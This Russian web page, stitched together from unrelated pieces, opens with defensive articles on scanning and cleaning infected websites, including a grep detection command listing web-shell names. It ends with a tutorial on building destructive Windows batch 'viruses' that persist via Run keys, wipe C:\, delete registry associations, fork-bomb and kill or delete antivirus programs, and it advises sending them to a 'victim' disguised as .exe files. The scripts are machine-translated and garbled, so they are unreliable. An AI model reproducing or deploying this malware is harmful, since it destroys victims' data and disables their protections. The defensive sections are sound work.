Как обнаружить вирус на сайте


Веб-сервисы для проверки сайтов на вирусы / Хабр

Рано или поздно веб-разработчик, веб-мастер или любой другой специалист, обслуживающий сайт, может столкнуться с проблемами безопасности: ресурс попадает под санкции поисковой системы или начинает блокироваться антивирусом, с хостинга могут прислать уведомление об обнаружении вредоносного кода, а посетители начинают жаловаться на всплывающую рекламу или редиректы на “левые” сайты.

В этот момент возникает задача поиска источника проблемы, то есть диагностики сайта на проблемы безопасности. При грамотном подходе диагностика состоит из двух этапов:

  1. проверки файлов и базы данных на хостинге на наличие серверных вредоносных скриптов и инжектов,
  2. проверки страниц сайта на вирусный код, скрытые редиректы и другие проблемы, которые, порой, невозможно выявить статическим сканером файлов.

Предположим, вы уже проверили файлы на хостинге специализированными сканерами и почистили аккаунт хостинга от «вредоносов» (или ничего подозрительного на нем не нашлось), но поисковик все равно ругается на вирусный код или на сайте по-прежнему активен мобильный редирект. Что делать в этом случае? На помощь приходят веб-сканеры, которые выполняют динамический и статический анализ страниц сайта на вредоносный код.

Немного теории


Статический анализ страниц – это поиск вредоносных вставок (преимущественно javascript), спам-ссылок и спам-контента, фишинговых страниц и других статических элементов на проверяемой странице и в подключаемых файлах. Обнаружение подобных фрагментов выполняется на основе базы сигнатур или некоторого набора регулярных выражений. Если вредоносный код постоянно присутствует на странице или в загружаемых файлах, а также известен веб-сканеру (то есть он добавлен в базу сигнатур), то веб-сканер его обнаружит. Но так бывает не всегда. Например, вредоносный код может загружаться с другого ресурса или выполнять какие-то несанкционированные действия при определенных условиях:
  • по завершении загрузки страницы в нее добавляется javascript, который выполняет drive-by download атаку
  • пользователь уходит со страницы, в этот момент подгружается код и открывает popunder с контентом “для взрослых”
  • посетитель сайта находится на странице несколько секунд и только после этого его перенаправляют на платную подписку за смс
  • и т.п.

Несколько таких примеров:

Если заранее неизвестно, какой код провоцирует данные несанкционированные действия, то обнаружить его статическим анализом чрезвычайно сложно. К счастью, есть анализ динамический или иногда его еще называют “поведенческим”. Если веб-сканер умный, он будет не просто анализировать исходный код страницы или файлов, но еще и пытаться совершать какие-то операции, эмулируя действия реального посетителя. После каждого действия или при определенных условиях робот сканера анализирует изменения и накапливает данные для итогового отчета: загружает страницу в нескольких браузерах (причем, не просто с разных User-Agent’ов, а с разными значениями объекта navigator в javascript, разными document.referer и т.п.), ускоряет внутренний таймер, отлавливает редиректы на внешние ресурсы, отслеживает то, что передается в eval(), document.write() и т.п. Продвинутый веб-сканер всегда будет проверять код страницы и объекты на ней как до начала выполнения всех скриптов (сразу после загрузки страницы), так и спустя некоторое время, поскольку современные “вредоносы” динамически добавляют или скрывают объекты на javascript, а также выполняют фоновые загрузки внутри динамических фреймов. Например, код зараженного виджета может через 3 секунды или по движению мыши загрузить скрипт, который вставит на страницу javascript с редиректом на загрузку опасного .apk файла. Естественно, никакой статический анализ (кроме как заранее знать, что виджет опасен) или поиск по файлам такое не выявит.

А теперь, с пониманием требований к диагностике сайта и веб-сканерам, попробуем найти те, которые действительно эффективны. К сожалению, то что представлено на первой странице поисковика по запросу “проверить сайт на вирусы онлайн” сразу никуда не годится. Это или “поделки”, которые в лучшем случае могут выполнить статический анализ страницы (например, найти IFRAME, который может быть и не опасен), или агрегаторы сторонних API, проверяющие URL сайта по базе Google Safe Browsing API, Yandex Safe Browing API или VirusTotal API.

Если проверять сайт десктопным антивирусом, то анализ будет скорее всего также статический: антивирус умело блокирует загрузки с известных ему зараженных сайтов, но какого-то глубокого динамического анализа страниц сайта от него не стоит ожидать (хотя некоторые антивирусы действительно обнаруживают сигнатуры в файлах и на странице).

В итоге, после проверки двух десятков известных сервисов, я бы хотел остановиться на представленных ниже.

Веб-сканер QUTTERA

Выполняет поиск вредоносного кода на страницах, используя бессигнатурный анализ. То есть обладает некой эвристикой и выполняет динамический анализ страниц, что позволяет обнаруживать 0-day угрозы. Из приятных особенностей стоит отметить возможность проверки сразу нескольких страниц сайта, поскольку проверять по одной не всегда эффективно.
Хорошо обнаруживает угрозы, связанные с загрузкой или размерещением троянов, завирусованных исполняемых файлов. Ориентирован на западные сайты с их характерными заражениями, но часто выручает и при проверке зараженных сайтов рунета. Поскольку сервис бесплатный, есть очередь на обработку задач, поэтому придется немного подождать.

Веб-сканер ReScan.pro

Выполняет динамический и статический анализ сайта. Поведенческим анализом детектятся скрытые редиректы, статический анализ ищет вирусные фрагменты на страницах и в загружаемых файлах, а базой черного списка определяются ресурсы, загружаемые с зараженных доменов. Ходит по внутренним ссылкам, поэтому кроме основного URL проверяет еще несколько смежных страниц сайта. Приятным дополнением является проверка сайта по блек-листам Яндекс, Google и VirusTotal. Ориентирован в основном на вредоносы, которые обитают в рунете. Поскольку сервис бесплатный, лимит на проверку – 3 запроса с одного IP в сутки.

Веб-сканер Sucuri

Ищет вирусный код по сигнатурам и с помощью эвристики. Отправляет запросы к нескольким URL на сайте с различными User Agent / Referer. Обнаруживает спам-ссылки, дорвей-страницы, опасные скрипты. Кроме того, умеет проверять актуальные версии CMS и веб-сервера. Ограничений на число проверок не замечено. Из небольшого минуса обнаружилось, что список проверенных сайтов с результатами индексируется поисковыми системами, то есть можно посмотреть, какой сайт и чем был заражен (сейчас в поисковом индексе около 90 000 страниц), тем не менее эффективности сканера это не умаляет.

Redleg's File Viewer

Еще один западный веб-сканер сайтов. Может немного отпугивать своим аскетичным интерфейсом из 90-х, но, тем не менее, он позволяет выполнить полноценный статический анализ сайта и подключенных на странице файлов. При сканировании пользователь может задать параметры User Agent, referer, параметры проверки страницы. В настройках есть проверка страницы из кэша Google. Лимитов на проверку сайтов не обнаружено.

VirusTotal

Ну и, наконец, знакомый многим VirusTotal. Он не является в полной мере веб-сканером, но его также рекомендуется использовать для диагностики, так как он является агрегатором нескольких десятков антивирусов и антивирусных сервисов.

***

Упомянутые веб-сканеры можно добавить в закладки, чтобы при необходимости провести диагностику сразу эффективными инструментами, и не тратить время на платные или неэффективные сервисы.

Вирус на веб-сайте - как удалить и предотвратить

Никто не хочет обнаруживать украденные данные своего веб-сайта или обнаруживать, что они стали источником заражения для других веб-сайтов. Однако бывает.

Обычно сайт заражается системами управления контентом (CMS) и плагинами для них. В этом случае может быть два разных сценария. Вы можете загрузить зараженный файл из неофициального источника или официального плагина, или обновление может содержать ошибки, которые могут быть использованы хакерами.Такие ошибки называются уязвимостями.

Хакеры хранят информацию об уязвимостях и сканируют различные веб-сайты, чтобы найти жертву. Обнаружив его, они могут использовать уязвимость для загрузки вредоносного ПО с целью рассылки спама, кражи различных данных или перенаправления пользователей на другие веб-сайты.

Возможны и другие сценарии, но шансы ниже.

Как узнать, что мой сайт заражен?

В большинстве случаев сигнал тревоги отправляется браузером, антивирусом на рабочем столе или панелью веб-мастера.Чтобы быть уверенным, вы можете воспользоваться следующими бесплатными услугами:

Что мне делать, если мой веб-сайт заражен?

Обновите программное обеспечение. При обнаружении новых уязвимостей разработчики программного обеспечения выпускают обновления, содержащие исправления для их исправления. Для загрузки обновлений рекомендуем использовать только официальные сайты: WordPress, Joomla !, Drupal. Вы также можете использовать KernelCare для автоматического обновления ядра ОС. Решение позволяет устанавливать новейшие патчи без перезагрузки сервера.Модуль интеграции KernelCare можно установить в ISPmanager.

Удалить неавторизованные плагины. Устанавливайте только плагины, разработанные официальными разработчиками. Если вы найдете «бесплатную копию» какого-либо коммерческого плагина, велика вероятность, что он содержит вредоносное ПО. Всегда лучше платить за подлинное программное обеспечение, чем лечить зараженный сайт.

Смена паролей. Это широко распространенный сценарий, когда вирус заражает веб-сайт, используя пароль администратора для FTP или CMS, который был украден с электронной почты или рабочего стола.Смена паролей для доступа к панели управления сервером, FTP / SSH-аккаунтам, MySQL и CMS. Используйте только надежные пароли, содержащие более 10 символов с заглавными и заглавными буквами, специальные знаки и цифры. Вы можете воспользоваться бесплатными сервисами для генерации таких паролей: 1, 2.

Настроить права доступа к файлам. Используйте FTP или ISPmanager для настройки прав доступа к файлам вашего сайта. Права определяют, кто может смотреть, писать и редактировать код. Мы рекомендуем выбрать значение 644 для файлов веб-сайта (644 означает, что только администратор может изменять код, а просмотр и выполнение доступны для любого посетителя веб-сайта).Для каталогов лучше установить 755, что означает, что администратор имеет права чтения / редактирования, когда другие пользователи имеют права только для чтения.

Восстановить резервную копию. Если вы знаете момент, когда ваш сайт был заражен, вы можете восстановить резервную копию, созданную до этой даты. Это позволит вам избежать лечения вируса.

Заблокируйте функции, которые вы не используете, в файлах конфигурации PHP. Откройте конфигурацию PHP (php.ini) и добавьте «disable_functionst» к следующим функциям, если вы их не используете: passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source.

Как вылечить сайт

Это можно сделать вручную или с помощью специального антивирусного ПО.

Если вы хорошо умеете работать с серверной консолью, вы можете очистить код веб-сайта вручную. Для начала вам нужно найти вредоносное ПО: открыть файлы своего сайта и сравнить их с такими же файлами из резервной копии. После этого вы сможете находить зараженные файлы и удалять вредоносные программы, используя тип файла и фрагмент кода.

Вот пример команды для поиска шаблонов вирусов в файлах php * и htm * каталоге / var / www / * / data / www /:

grep -Rils --include = \.{php, htm *} -e 'b = 4594' -e 'e2aa4e' -e 'v58f57b98 = 0' -e 'forexam \ @ pandion.im' -e 'pathToDomains' -e 'if (navigator.userAgent.match ('-e' var vst = String.fromCharCode '-e' Меню \ files \ /jquery.js '-e' i5463 == null '-e' r57.gen.tr '-e' \ /rsize.js ' -e 'feelthesame.changeip.name' -e '40, 101,115,110,98,114,105,110 '-e' c99sh '-e' Оболочка от '-e' sh_ver '-e' \ .tcpflood '-e' c999sh '-e' Массив (base64_decode '-e' Perl-файл атакующего '-e' bogel = '-e' (\! function_exists (\ "getmicrotime \")) '-e' \ $ d = substr '-e' WSO '-e' r57shell '- e 'msg = @ gzinflate (@ base64_decode (@str_replace' -e '6POkiojiO7iY3ns1rn8' -e 'mysql_safe' -e 'sql2_safe' -e 'aHR0cDovLzE3OC4yMTEu' -e 'php function _'-URL) '-e' \; if (isset (\ $ _ REQUEST '-e' UdpFlood '-e' udp \: \ / \ / 1.1.1.1 '-e' \ (md5 (\ $ _ POST \ ['-e' header (\ "Местоположение \: http '-e' fx29sh '-e' c999sh_surl '-e' c99sh '-e' \ /request12.php '-e' NlOThmMjgyODM0NjkyODdiYT '-e' semi-priv8 '-e' JHNoX25hbWUgPSAiIj '-e' - $ shell e 'UvUbjYh5eJNgF4E1fedl' -e 'killall \ -9' -e 'Angel Shell' -e 'c100.php' -e 'c2007.php' -e 'c99 mod Captain Crunch' -e '\ $ c99sh_updatefurl' -e ' C99 Изменено Psych0 '-e' php-backdoor '-e' r577.php '-e' wso shell '-e' backdoor '-e' eval (stripslashes ('-e' Backdoor '-e' Set WSHshell '- e 'WSHshell.Запустите DropPath '-e / var / www / * / data / www /

Антивирусы

Если у вас нет опыта работы с консолью сервера, вы можете использовать специальное программное обеспечение. Следующие антивирусы содержат самые большие базы данных, содержащие шаблоны вирусов, широко распространенных в сети: Virusdie и AI-Bolit.

Virusdie

Это коммерческое программное обеспечение, предназначенное для автоматического поиска и удаления вредоносных программ. Его также можно использовать для снятия санкций с браузера. Благодаря интеграции с панелью управления ISPmanager работа с Virusdie станет удобной даже для неопытных пользователей.У модуля есть бесплатная версия, которая может сканировать сайты на вирусы каждые три часа.

ImunifyAV

Бесплатный антивирусный сканер для сканирования веб-сайтов на предмет взлома, вирусов и вредоносных скриптов. ImunifyAV Antivirus доступен в ISPmanager Lite начиная с версии 5.182 вместо Revisium Antivirus, который использовался в более ранних версиях панели управления.

Как избежать заражения

  1. Используйте только проверенные источники для загрузки программного обеспечения.
  2. Создавайте надежные пароли и не сохраняйте их в браузере.
  3. Настройте расписание резервного копирования.
  4. Изолируйте разные сайты друг от друга, создав для каждого сайта отдельного пользователя.
  5. Всегда используйте Virusdie.
  6. Используйте Softaculous для синхронного обновления установленных скриптов, для большего удобства установите модуль интеграции с ISPmanager.
.

Как обнаружить вирус троянского коня - и как удалить вирус, если ваш веб-сайт заражен

Избегайте распространенных вредоносных программ

Когда дело доходит до угроз сетевой безопасности, троянский конь является одним из наиболее распространенных типов вредоносных файлов, поражающих веб-сайты. Таргетингом становятся не только крупные бренды и популярные веб-сайты - владельцы малых предприятий, у которых есть веб-сайт, также рискуют заразиться вирусом троянского коня.

В сегодняшней статье мы обсудим, что такое вирус троянского коня, поделимся советами о том, как его обнаружить и удалить, а также какие отрасли наиболее подвержены кибератаке, а также некоторые примеры из реальной жизни.

Что такое вирус троянского коня?

Вирус троянского коня - это тип вредоносного ПО, которое было разработано хакерами так, чтобы оно выглядело как законный файл. Название этого вируса происходит из греческой мифологии, потому что вирус действует так же, как греческие войска, которые спрятались внутри деревянной лошади, чтобы вторгнуться в Трою.

Вирус троянского коня прикрепляется к файлам, загруженным из Интернета, и как только жертва загружает и открывает или запускает файл, вирус скрывается в фоновом режиме.

Затем хакеры могут использовать вирус для получения доступа к информации пользователей без их ведома. Он также создает бэкдор для хакеров, который позволяет им получить доступ к системе пользователей и действовать как программа-вымогатель, требуя, чтобы вы заплатили определенную сумму денег, чтобы восстановить доступ.

Вирус троянского коня может удалять и изменять данные, а также блокировать и копировать данные.

Это также может вызвать перебои в работе системы или сети. Вирусы троянских коней не распространяются как обычные вирусы, а скорее подстерегают и используют данные, а также загружают другие типы вредоносных файлов в зараженную систему, включая веб-сайты.

Вирус троянского коня может заразить ваш сайт через файлы на вашем сайте, а также через сервер, на котором он размещен.

По теме: Защитите свою библиотеку, некоммерческую или муниципальную организацию от вируса-вымогателя

Как обнаружить и удалить вирус троянского коня

Вирус троянского коня может привести к тому, что система отобразит ошибку DLL, потерянные файлы, удаление брандмауэров и сбой системы - или вы можете даже не заметить, что что-то не так.Как только вы заметили атаку троянского коня, очень важно знать, как удалить вирус.

Хотя вы можете попытаться удалить вирус вручную, помните, что эта задача требует не только времени, но и определенных технических знаний, которых нет у большинства владельцев малого бизнеса.

Поэтому разумно использовать специальный инструмент, который очистит ваш сайт от вредоносных программ. Такой инструмент, как Express Malware Removal from GoDaddy, может помочь вам удалить вредоносные файлы с вашего сайта.Инструмент просканирует ваш сайт и вручную удалит все угрозы и восстановит ваш сайт столько раз, сколько потребуется, пока он не станет на 100 процентов чистым и безопасным.

Когда ваш сайт будет свободен от вредоносных программ, используйте GoDaddy Website Security, чтобы предотвратить любые атаки в будущем. GoDaddy Website Security будет выполнять расширенное регулярное сканирование безопасности вашего сайта, а также отслеживать репутацию вашего бренда и помогать вам убрать ваш сайт из черного списка в Google и других поисковых системах.

Фото: GoDaddy Website Security

Вы также захотите регулярно выполнять резервное копирование своего сайта.Они являются отличной мерой безопасности, поскольку с помощью резервной копии вы можете легко восстановить свой веб-сайт в случае худшего.

Какие отрасли являются популярными целями хакеров и почему

Когда дело доходит до веб-сайтов, определенные ниши веб-сайтов более уязвимы для атак, чем другие.

Веб-сайты, принадлежащие юридической, финансовой, правительственной и образовательной отраслям, более привлекательны, чем другие.

Еще одна отрасль, очень привлекательная для хакеров, особенно в последние годы, - это здравоохранение.По данным IBM, 2015 год стал годом нарушений в сфере здравоохранения, а другой отчет показывает, что одна запись Medicare может принести до 500 долларов в темной сети. Учитывая, что в вашем отчете по программам Medicare или Medicaid указывается не только ваш номер социального страхования, но и ваша работа, адрес, информация о супругах и детях, легко понять, почему отрасль здравоохранения так интересна хакерам.

Точно так же финансовые учреждения могут раскрывать номера ваших кредитных карт и вашу финансовую информацию, поэтому они по-прежнему являются общей целью.Правительственные, образовательные и юридические веб-сайты также являются мишенями, поскольку они содержат ценную и конфиденциальную информацию, часто охватывающую большую базу пользователей.

Независимо от того, к какой отрасли принадлежит веб-сайт, можно с уверенностью сказать, что последствия нарушения безопасности могут быть весьма серьезными для их пользователей, клиентов и заказчиков.

После кражи данных их можно использовать несколькими способами:

  • Продается в даркнете, где другие киберпреступники могут воспользоваться им.
  • Личность ваших клиентов могут быть украдены, что нанесет ущерб репутации вашего бизнеса и вашей кредитной истории.
  • Ваш бизнес и бизнес ваших клиентов, веб-сайт, персональный компьютер и другие устройства могут стать целью следующей попытки взлома.
  • Дом ваших клиентов может стать целью ограбления.
  • Финансовая информация ваших клиентов может быть использована для совершения крупных покупок в Интернете без вашего
  • знаний, что приводит к выплате больших сумм долга.
    … и многое другое.

Связано: 5 лучших практик управления данными клиентов

3 реальных примера взломанных сайтов

Ниже вы найдете три примера веб-сайтов, пострадавших от вредоносного ПО.

Фотография предоставлена: GoDaddy
1. Simplii Financial and Bank of Montreal (BMO), Канада

В мае 2018 года два крупных канадских банка столкнулись с нарушением безопасности. Эта атака, возможно, затронула секретную и конфиденциальную информацию примерно 90 000 клиентов, и преступники потребовали выкуп в размере 1 миллиона долларов. После инцидента BMO выступила с заявлением, в котором утверждалось, что они не платили выкуп, но делают все возможное, чтобы помочь и защитить своих клиентов, в том числе предлагают услуги поддержки и кредитного мониторинга.

2. BMW и Rolls Royce

В 2017 году в автомобилях BMW и Rolls Royce с программным обеспечением ConnectedDrive была обнаружена уязвимость в системе безопасности. ConnectedDrive позволяет открывать дверь автомобиля с помощью смартфона. Когда уязвимость ConnectedDrive была объединена с более ранним взломом BMW для угона автомобиля, угон автомобиля становится простым делом.

И BMW, и Rolls Royce выпустили исправление безопасности для программного обеспечения для всех автомобилей, пострадавших от взлома.

3. Голливудский пресвитерианский медицинский центр

Пресвитерианский медицинский центр Голливуда в 2016 году стал жертвой вымогателя, и злоумышленники потребовали выкуп в размере 17000 долларов.Их сеть не работала в течение недели, прежде чем больница, наконец, решила заплатить выкуп, поскольку они думали, что это «самый быстрый и эффективный способ восстановить наши системы и административные функции - заплатить выкуп и получить ключ дешифрования».

Связанные: 5 отраслей, в которых нельзя игнорировать расширенную веб-безопасность

Удалите вредоносные программы и защитите свой сайт от сетевых угроз

Защита вашего сайта и удаление вредоносных программ в тот момент, когда вы обнаружите нарушение безопасности, имеет решающее значение для защиты вашего сайта от сетевых угроз.Воспользуйтесь советами из этой статьи, чтобы защитить свой сайт и научиться определять распространенные угрозы, такие как вирусы троянских коней.

.

Как антивирусные программы обнаруживают вирусы?

Переполнение стека
  1. Около
  2. Товары
  3. Для команд
  1. Переполнение стека Общественные вопросы и ответы
  2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами
  3. Вакансии Программирование и связанные с ним технические возможности карьерного роста
  4. Талант Нанимайте технических специалистов и создавайте свой бренд работодателя
.

Как создать опасный вирус для блокнота [10+ кодов] - Tech3Hack

Вы когда-нибудь думали о создании компьютерного вируса самостоятельно? Не беспокойтесь, вот полное руководство, которое расскажет вам, как шаг за шагом создать простой, но опасный вирус для блокнота, с объяснениями! 😎


Как вы все знаете, вирус - это не что иное, как вредоносная программа, которая проникает в систему без разрешения и влияет на данные и работу операционной системы. Вирусы выполняют нежелательные задачи, такие как репликация самих себя, повреждая файлы пользователей и т. Д., Поэтому, по сути, мы собираемся создать несколько нежелательных скриптов, которые мы можем выполнить, чтобы разрушить или сломать систему.

Если вы предпочитаете видеоуроки с сообщениями на Tech3Hack, то нажмите «Подписаться» ниже:

Также подпишитесь на мгновенную дозу технологий:

Подробнее:

Создать исполняемый файл вируса для блокнота (.exe) с помощью пакетного сценария

Прежде всего, что такое пакетный сценарий, тем, кто не знает, взгляните ниже:

«Это просто текстовый файл, содержащий серию команд, которые выполняются автоматически, строка за строкой, когда командный файл запускается.”

Используя пакетный файл, вы можете создать чрезвычайно опасный вирус, который может удалять файлы Windows, форматировать различные диски [C: \, E:], красть файлы данных и информацию, отключать антивирус, брандмауэр и т. Д.

ПРИМЕЧАНИЕ: Этот пост предназначен исключительно и в основном для образовательных целей. Я нигде не несу ответственности за любой ущерб, причиненный этим руководством, для получения дополнительной информации прочтите наш отказ от ответственности.

Напишите опасный вирус в Блокноте / текстовом редакторе

Готовы ли вы создать свой первый вирус DIY Notepad, давайте приступим к делу,

Прежде всего, вам, очевидно, нужен ПК с Windows.😉

Для этого руководства по созданию простого вируса для блокнота вам не нужно быть закоренелым программистом или чем-то в этом роде, но базовые знания блок-схем и циклов очень помогут вам понять, что здесь происходит. Итак, давайте приступим к созданию троянского вируса с помощью блокнота для запуска из командной строки (cmd) в Windows 10, 8 / 8.1, 7 или XP.

Теперь откройте приложение «Блокнот» и скопируйте (Ctrl + C) и вставьте (Ctrl + V) коды, приведенные ниже, один за другим для разных вирусов в другой файл.

Скопируйте (Ctrl + C) и вставьте (Ctrl + V) исходный код

Примечание : Я не несу ответственности за любые сообщения об ошибках или повреждениях на вашем ПК, делайте это на свой страх и риск.

Предупреждение: Не пытайтесь использовать это на своем повседневном рабочем компьютере.

Вы читали мои предыдущие посты, будет здорово посмотреть;

Исходные коды вируса Блокнота приведены ниже:

1. Отключить Интернет навсегда

Этот код навсегда отключит подключение к Интернету.

 эхо @ эхо выкл> c: windowswimn32.bat эхо прервется> c: windowswimn32.bat echo ipconfig / release_all> c: windowswimn32.bat echo end> ​​c: windowswimn32.batreg добавить hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun / v WINDOWsAPI / t reg_sz / d c: windowswimn32.bat / freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun / v CONTROLexit / t reg_sz / d c: windowswimn32.bat / fecho Вас взломали! ПАУЗА 

2. Удалить ключевые файлы реестра

Это приведет к удалению ключевых файлов реестра, а затем зациклится сообщение.

Это опасный и невосстановимый вирус Блокнота.

 @ECHO OFF НАЧАТЬ reg удалить HKCR / .exe НАЧАТЬ reg удалить HKCR / .dll НАЧАТЬ reg удалить HKCR / * :СООБЩЕНИЕ ECHO Ваш компьютер разбился. Ваш папа. НАЙТИ СООБЩЕНИЕ 

3. Бесконечные блокноты

Это будет выскакивать бесконечные блокноты, пока компьютер не зависнет и не выйдет из строя

 @ECHO off :верхняя ЗАПУСК% SystemRoot% \ system32 \ notepad.exe GOTO top 

4. Извлечение дисководов компакт-дисков

Это заставит дисководы компакт-дисков постоянно выдвигаться.

 Установите oWMP = CreateObject (”WMPlayer.OCX.7 ″) Установите colCDROMs = oWMP.cdromCollection делать если colCDROMs.Count> = 1, то Для i = 0 в colCDROMs.Count - 1 colCDROMs.Item (i) .Eject следующий Для i = 0 в colCDROMs.Count - 1 colCDROMs.Item (i) .Eject следующий Конец, если wscript.sleep 100 loop 

5. Бесконечный ввод

Это заставит кнопку ввода постоянно нажимать

 Set wshShell = wscript.CreateObject ("WScript.Shell") делать wscript.sleep 100 wshshell.sendkeys «~ (ввод)» петля 

6.Application Bomber

Он начнет многократно открывать различные приложения, что повлияет на производительность системы.

Вы также можете добавить приложение по вашему выбору в код выше.

 @ эхо выкл. :Икс начать winword запустить mspaint запустить блокнот начать писать запустить cmd начать исследователь управление запуском начать расчет goto x 

7.Folder Flooder

Это создаст неограниченное количество файлов. папок.

 @ эхо выкл. :Икс md% random% / папка.goto x 

8. Flooder учетной записи пользователя

Это создаст большой номер. учетной записи пользователя на своем ПК и переходит на

 @echo off : xnet пользователь% random% / добавить goto x 

9.Process Creator

Это создаст неограниченное количество фоновых процессов

% 0 |% 0 

10.Windows Hacker

Это удалит весь ваш диск C: \ и его невозможно восстановить

 @Echo off Del C: \ *. * | Y 

10+. Anti Virus Disabler

Этот большой код отключает любой антивирус, установленный в системе

 @ echo off rem rem навсегда убить антивирус net stop «Центр безопасности» брандмауэр netsh установить режим opmode = отключить tskill / A ср * tskill / Пожар * tskill / A анти * cls tskill / шпион * tskill / Булгард tskill / A PersFw tskill / A KAV * tskill / ЗОНАЛЬНАЯ СИГНАЛИЗАЦИЯ tskill / A SAFEWEB cls tskill / шпион * tskill / Булгард tskill / A PersFw tskill / A KAV * tskill / ЗОНАЛЬНАЯ СИГНАЛИЗАЦИЯ tskill / A SAFEWEB cls tskill / А ВЫХОД tskill / A nv * tskill / навигация * tskill / A F- * tskill / A ESAFE tskill / A cle cls tskill / A BLACKICE tskill / A def * tskill / A kav tskill / Кав * tskill / A в среднем * tskill / A ясень * cls tskill / A aswupdsv tskill / Эвид * tskill / Охранник * tskill / А гуар * tskill / A gcasDt * tskill / MSMP * cls tskill / A mcafe * tskill / A mghtml tskill / A msiexec tskill / Аванпост tskill / A isafe tskill / A zap * cls tskill / Зауинст tskill / A upd * tskill / A zlclien * tskill / Минилог tskill / A cc * tskill / A norton * cls tskill / A norton au * tskill / A ccc * tskill / НПФМН * tskill / Лодж * tskill / A nisum * tskill / A issvc tskill / A tmp * cls tskill / A tmn * tskill / A pcc * tskill / A cpd * tskill / Поп * tskill / Пав * tskill / A padmincls tskill / панда * тскилл / А авщ * tskill / A sche * tskill / Симан * tskill / вирус * tskill / Царство * cls tskill / развертка * tskill / сканирование * tskill / A ad- * tskill / Сейф * tskill / A avas * tskill / Норма * cls tskill / A offg * del / Q / F C: \ Program Files \ alwils ~ 1 \ avast4 \ *.* del / Q / F C: \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ *. exe del / Q / F C: \ Program Files \ kasper ~ 1 \ *. exe cls del / Q / F C: \ Program Files \ trojan ~ 1 \ *. exe del / Q / F C: \ Program Files \ f-prot95 \ *. dll del / Q / F C: \ Program Files \ tbav \ *. datcls del / Q / F C: \ Program Files \ avpersonal \ *. vdf del / Q / F C: \ Program Files \ Norton ~ 1 \ *. cnt del / Q / F C: \ Program Files \ Mcafee \ *. * cls del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *. * del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *. * del / Q / F C: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ *.* del / Q / F C: \ Program Files \ Norton ~ 1 \ *. * cls del / Q / F C: \ Program Files \ avgamsr \ *. exe del / Q / F C: \ Program Files \ avgamsvr \ *. exe del / Q / F C: \ Program Files \ avgemc \ *. exe cls del / Q / F C: \ Program Files \ avgcc \ *. exe del / Q / F C: \ Program Files \ avgupsvc \ *. exe дель / Q / F C: \ Program Files \ grisoft del / Q / F C: \ Program Files \ nood32krn \ *. exe del / Q / F C: \ Program Files \ nood32 \ *. exe cls del / Q / F C: \ Program Files \ nod32 del / Q / F C: \ Program Files \ nood32 del / Q / F C: \ Program Files \ kav \ *. exe del / Q / F C: \ Program Files \ kavmm \ *.Exe del / Q / F C: \ Program Files \ kaspersky \ *. * cls del / Q / F C: \ Program Files \ ewidoctrl \ *. exe del / Q / F C: \ Program Files \ Guard \ *. exe del / Q / F C: \ Program Files \ ewido \ *. exe cls del / Q / F C: \ Program Files \ pavprsrv \ *. exe del / Q / F C: \ Program Files \ pavprot \ *. exe del / Q / F C: \ Program Files \ avengine \ *. exe cls del / Q / F C: \ Program Files \ apvxdwin \ *. exe del / Q / F C: \ Program Files \ webproxy \ *. exe дель / Q / F C: \ Program Files \ панда программное обеспечение\*.* rem 

После копирования и вставки любого из вирусов за раз в Блокноте сохраните файл в режиме ВСЕ ФАЙЛЫ с расширением «.bat “(без кавычек, как показано на изображении).

Сохраните файл в режиме ВСЕ ФАЙЛЫ с расширением «.bat».

ВЫПОЛНЕНО: Вы успешно создали вирус для Блокнота. Вот и все, теперь вы закончили делать свою работу, теперь вам нужно отправить файл жертве.

Готово, создание командного файла

Недостатком вируса, содержащего пакетный файл, является то, что любой может открыть его с помощью блокнота и легко прочитать команды, а также удалить, если он окажется вредоносным. Итак, чтобы преодолеть это ограничение / недостаток, вы можете использовать инструмент под названием «Пакетный преобразователь в исполняемый файл».Он преобразует расширение « .bat » в расширение « .exe ». Следовательно, ваш командный файл будет преобразован в приложение Windows. Это поможет убедить вашу жертву открыть файл.

Bat2Exe

Загрузите BatToExe для простого преобразования командных файлов в исполняемые, нажав здесь

ПРИМЕЧАНИЕ: Это руководство предназначено только для компьютеров под управлением Windows, эти вирусы не работают на Linux или MAC.

Также читайте:

Завершение работы

Итак, друзья надеются, что вам понравился пост о , как создать вирус блокнота с использованием пакетного сценария , я сделал этот урок более информативным, попробуйте создать их вирус самостоятельно, если вы столкнетесь с какой-либо проблемой и вам понадобится помощь, не стесняйтесь комментировать, я всегда здесь для вашей помощи и не забудьте поделиться этим сообщением с друзьями, если вы нашли его полезным и приятным, а также за поддержку меня в будущем в ближайшем будущем.

Если вы предпочитаете видеоуроки с сообщениями на Tech3Hack, то нажмите «Подписаться» ниже:

Также, подпишитесь на мгновенную техническую дозу:

До свидания, и не забудьте подписаться на нашу рассылку, заполнив форму ниже.

Продолжайте посещать, продолжайте учиться.


Статьи по теме


Поделиться - это сексуально, попробуйте:

Связанные

.

Смотрите также

Поделиться в соц. сетях

Опубликовать в Facebook
Опубликовать в Одноклассники
Вы можете оставить комментарий, или ссылку на Ваш сайт.

Оставить комментарий